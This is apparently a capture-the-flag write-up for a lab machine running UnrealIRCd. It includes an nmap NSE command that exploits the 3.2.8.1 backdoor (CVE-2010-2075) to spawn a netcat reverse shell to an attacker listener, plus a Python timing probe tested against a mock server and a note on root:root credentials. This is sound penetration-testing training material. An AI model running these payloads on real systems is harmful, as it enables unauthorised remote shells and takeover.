We always start with an nmap scan:
nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Tue Apr 27 15:21:07 2021 as: nmap -sC -sV -oA nmap 192.168.57.120
Nmap scan report for 192.168.57.120
Host is up (0.22s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
6667/tcp open  irc     UnrealIRCd
Service Info: Host: irc.foonet.com

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 27 15:22:06 2021 -- 1 IP address (1 host up) scanned in 59.09 seconds
Just an IRC port on 6667, cool. Doing some research on UnrealIRCd I found that Nmap ships a well-known irc-unrealircd-backdoor NSE script, so I gave it a shot.
The irc-unrealircd-backdoor.command script argument can be used to run an arbitrary command on the remote system. Because of the nature of this vulnerability (the output is never returned), there is no way to get the output of the command. It can, however, be used to spawn a reverse shell back to a netcat listener, as demonstrated here (the port and target must match the scan above, so 6667 and 192.168.57.120; 10.10.10.1 and 1337 are your own listener's address and port, and -e needs a netcat build on the target that supports it):
nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='nc -e /bin/sh 10.10.10.1 1337' 192.168.57.120
Before running the backdoor NSE script we need to start an Ncat listener on our machine, on the port given in the script argument (1337 here).
Now let's hit the NSE script.
And we have a shell.
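The reason the NSE script can tell a backdoored UnrealIRCd from a clean one without ever seeing command output is timing: the trojaned 3.2.8.1 build (CVE-2010-2075) hands any line starting with "AB;" to system(), so "AB;sleep N" stalls the daemon for about N seconds before it answers. The following is an added example, not code from this write-up or from the Nmap project: it re-implements that timing check in Python and runs it against a small mock IRC server constructed here so it works offline. The mock, its 421 reply, and the reuse of the hostname irc.foonet.com from the scan are all assumptions of the example; only the "AB;" trigger and the sleep-based probe are properties of the real backdoor.

```python
"""Timing probe for the UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075).

Added example, not from the original write-up or from Nmap. The backdoored
build passes any line beginning with "AB;" to system(), so "AB;sleep N"
stalls the single-threaded daemon for ~N seconds before it answers, while a
clean server answers immediately. The mock server below is constructed for
offline use and only emulates that one behaviour.
"""
import socket
import threading
import time

TRIGGER = b"AB;"
# Hostname reused from the scan above; the banner text is an assumption.
BANNER = b":irc.foonet.com NOTICE AUTH :*** Looking up your hostname...\r\n"


def backdoor_check(host, port, delay=1, timeout=5.0):
    """Send "AB;sleep <delay>" and time the reply.

    Returns True if the reply is delayed by roughly `delay` seconds (backdoor
    present), False if it comes straight back, and None if nothing arrived
    within `timeout` (inconclusive: filtered, dead, or not an IRC server).
    """
    with socket.create_connection((host, port), timeout=delay + timeout) as s:
        # Drain any connect-time banner so it is not mistaken for the reply.
        s.settimeout(0.5)
        try:
            while s.recv(4096):
                pass
        except socket.timeout:
            pass
        s.settimeout(delay + timeout)

        start = time.monotonic()
        s.sendall(TRIGGER + b"sleep %d\r\n" % delay)
        try:
            data = s.recv(4096)
        except socket.timeout:
            return None
        elapsed = time.monotonic() - start
    if not data:
        return None
    # A clean daemon replies in milliseconds; allow some slack on the sleep.
    return elapsed >= 0.8 * delay


def mock_ircd(backdoored):
    """Start a throwaway IRC-ish server on 127.0.0.1 and return its port.

    Constructed for this example: it greets the client, then answers every
    line with a 421. When `backdoored`, it first honours an "AB;sleep N"
    trigger the way the real backdoor hands the line to system(). Nothing
    is actually executed; only the sleep is emulated.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            conn.sendall(BANNER)
            buf = b""
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                buf += chunk
                while b"\n" in buf:
                    line, buf = buf.split(b"\n", 1)
                    line = line.rstrip(b"\r")
                    if backdoored and line.startswith(TRIGGER):
                        cmd = line[len(TRIGGER):].split()
                        if len(cmd) == 2 and cmd[0] == b"sleep":
                            time.sleep(float(cmd[1].decode()))
                    conn.sendall(b":irc.foonet.com 421 * :Unknown command\r\n")

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    for flag in (True, False):
        port = mock_ircd(backdoored=flag)
        label = "backdoored mock" if flag else "clean mock"
        print(label, "->", backdoor_check("127.0.0.1", port))
```

Against a real target you would point backdoor_check at the scanned host and port 6667 instead of the mock. The same principle is why the write-up's payload works blind: the command runs server-side with no output path, so the listener (nc -lvnp 1337 on the attacking machine) has to be up before the script fires, and a sleep-based probe is the only confirmation you get before the shell connects back.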
It took me some time because the machine was so clean, but using
root for both the username and the password drops us into a root shell.
Greetings from Muzec